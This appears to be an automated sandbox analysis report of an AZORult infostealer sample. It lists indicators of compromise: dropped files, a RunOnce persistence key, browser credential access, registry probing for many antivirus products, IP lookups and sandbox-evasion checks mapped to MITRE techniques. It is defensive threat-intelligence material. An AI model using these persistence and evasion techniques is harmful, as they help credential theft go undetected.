azorult | 2936bb322c46103eefb391f6cd41bcce462214ad451484fef61ddc7563e40398

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation	setups.tmp

Loads dropped DLL 27 IoCs

pid	Process
4580	setups.tmp
4580	setups.tmp
4580	setups.tmp
4580	setups.tmp
4580	setups.tmp
4580	setups.tmp
4580	setups.tmp
2196	qye1epee4zr.tmp
196	Setup3310.tmp
196	Setup3310.tmp
192	vict.tmp
1976	vpn.tmp
1976	vpn.tmp
1044	IBInstaller_97039.tmp
1976	vpn.tmp
1976	vpn.tmp
1976	vpn.tmp
1976	vpn.tmp
1976	vpn.tmp
1976	vpn.tmp
2860	client32.exe
2860	client32.exe
2860	client32.exe
2860	client32.exe
2860	client32.exe
2860	client32.exe
2860	client32.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\s2ytpmwcssk = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\3ZVGN1LBQ5\\multitimer.exe\" 1 3.1617536605.6069a65d122d8"	multitimer.exe

Checks for any installed AV software in registry 1 TTPs 53 IoCs

Security Software Discovery

T1063

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ESET\NOD	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\F-Secure\Computer Security\DART	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\IKARUS\anti.virus	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\F-Secure\Computer Security\DART	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AntiVirService	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Sophos	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\BullGuard Ltd.\BullGuard\Main	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\F-Secure\Computer Security\DART	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\G Data\AntiVirenKit	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AVP18.0.0	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DrWebAVService	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Vba32\Loader	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\McAfee\DesktopProtection	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\ArcaBit	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McProxy	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ESET\NOD	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\MACHINE\Software\Avira\Antivirus	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\avast! Antivirus	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\ESET\NOD	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVG\AV	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AhnLab\V3IS80	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Avira\Antivirus	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AhnLab\V3IS80	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\KasperskyLab	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet\Services\MBAMProtector	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\FRISK Software\F-PROT Antivirus for Windows	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVG\AV	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AhnLab\V3IS80	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Fortinet\FortiClient\installed	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\K7 Computing\K7TotalSecurity	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVAST Software\Avast	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McAPExe	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Jiangmin\ComputerID	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Bitdefender\QuickScan	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\a2AntiMalware	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVG\AV	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\BavSvc	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\TrendMicro\UniClient	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 9 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
587	ipinfo.io
74	ipinfo.io
79	ipinfo.io
449	ipinfo.io
507	ipinfo.io
114	ip-api.com
238	ipinfo.io
241	ipinfo.io
330	ip-api.com

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	multitimer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	multitimer.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\MaskVPN\driver\win764\is-9AJLV.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp64\is-IJ7L1.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\libMaskVPN.dll	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\tunnle.exe	vpn.tmp
File opened for modification	C:\Program Files (x86)\viewerise\WeriseTweaker.exe	qye1epee4zr.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win732\is-QB153.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win732\is-QRI9G.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp32\is-LVN3F.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp64\is-Q7KTS.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-BMV9B.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-A9C95.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp32\is-8QS00.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\Install engine 16\libGLESv2.dll	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\Install engine 16\stdvcl40.dll	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\driver\winxp32\devcon.exe	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\unins000.dat	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win732\is-2II3C.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp32\is-U2JVO.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp64\is-U0OUS.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\unins000.msg	vpn.tmp
File opened for modification	C:\Program Files (x86)\Install engine 16\ucrtbase.dll	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\ssleay32.dll	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\polstore.dll	vpn.tmp
File created	C:\Program Files (x86)\viewerise\is-JV2D2.tmp	qye1epee4zr.tmp
File created	C:\Program Files (x86)\MaskVPN\is-33QEN.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp32\is-2PSLV.tmp	vpn.tmp
File created	C:\Program Files (x86)\Install engine 16\is-0AOE9.tmp	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\Install engine 16\is-IKEO7.tmp	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-CPH5M.tmp	vpn.tmp
File created	C:\Program Files (x86)\Install engine 16\is-F1ISD.tmp	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp32\is-6GVAV.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\unins000.dat	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-TC922.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win764\is-JK0BA.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp64\is-V8MM2.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\Install engine 16\PPMd.dll	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\Install engine 16\Swap.dll	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\MaskVPN\is-VOV7U.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-6O813.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win732\is-VUT2J.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win764\is-3EROO.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\ipseccmd.exe	vpn.tmp
File opened for modification	C:\Program Files (x86)\viewerise\unins000.dat	qye1epee4zr.tmp
File created	C:\Program Files (x86)\MaskVPN\is-P5PO7.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-U9EBR.tmp	vpn.tmp
File created	C:\Program Files (x86)\Install engine 16\is-RPF6A.tmp	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win732\is-OVCT3.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win764\is-DV06R.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\driver\win732\tapinstall.exe	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-SF7VL.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win764\is-TBTN7.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\Install engine 16\d3dcompiler_47.dll	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\Install engine 16\getithelper260.dll	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\Install engine 16\unins000.dat	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\driver\winxp64\devcon.exe	vpn.tmp
File created	C:\Program Files (x86)\Install engine 16\is-HDEC4.tmp	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\MaskVPN.exe	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe	vpn.tmp
File created	C:\Program Files (x86)\viewerise\unins000.dat	qye1epee4zr.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win732\is-9KEJC.tmp	vpn.tmp
File created	C:\Program Files (x86)\Install engine 16\is-KLKPB.tmp	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\MaskVPN\is-5B5RG.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-TNV3T.tmp	vpn.tmp

Drops file in Windows directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new	multitimer.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new	multitimer.exe
File opened for modification	C:\Windows\Logs\DPX\setupact.log	expand.exe
File opened for modification	C:\Windows\Logs\DPX\setuperr.log	expand.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 16 IoCs

pid	pid_target	Process	procid_target
4828	6732	WerFault.exe	256
6432	4464	WerFault.exe	139
2592	4464	WerFault.exe	139
6672	4464	WerFault.exe	139
576	4464	WerFault.exe	139
6412	4464	WerFault.exe	139
4752	4464	WerFault.exe	139
5940	4464	WerFault.exe	139
5140	4464	WerFault.exe	139
5764	4464	WerFault.exe	139
4820	4464	WerFault.exe	139
6456	4464	WerFault.exe	139
716	4464	WerFault.exe	139
6376	4464	WerFault.exe	139
7392	5212	WerFault.exe	154
6180	3972	WerFault.exe	389

Delays execution with timeout.exe 8 IoCs

evasion

pid	Process
6956	timeout.exe
1564	timeout.exe
5560	timeout.exe
4900	timeout.exe
6324	timeout.exe
6508	timeout.exe
5672	timeout.exe
6600	timeout.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	multitimer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	multitimer.exe

Kills process with taskkill 10 IoCs

evasion

pid	Process
5892	taskkill.exe
96	taskkill.exe
4912	taskkill.exe
6588	taskkill.exe
6140	taskkill.exe
748	taskkill.exe
7572	taskkill.exe
6340	taskkill.exe
5816	taskkill.exe
4420	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 3 IoCs

adware spyware

Modify Registry

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 0dea12384829d701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\InternetRegistry	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\TypedUrlsComplete = "1"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites\Order = 0c0000000a000000000000000c0000000100000000000000	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 010000000ce47ee39e2261b6de721212115e26099408e32f12c573d88b5b5d862134fd4b55d677fac56ba9687637200a1830ab16373163becf6a3d3fe10aef7b6c47a8dbe83d9e3ced557d0bf8184f2ab8ddf3bb766e69e6377248e6a982	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\LastClosedWidth = "800"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\SyncIEFirstTimeFullScan = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionI = "5"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\FirstRecoveryTime = 6c3a3b6c55add601	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{E6B2FC7B-BCE7-43D6-9FB4-1AC5E1D14725} = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Revision = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VendorId = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Privacy\InProgressFlags = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main\OperationalData = "1"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionI = "{EFC7F97C-57BD-410E-AEC0-D6AFE119053D}"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0"	MicrosoftEdge.exe
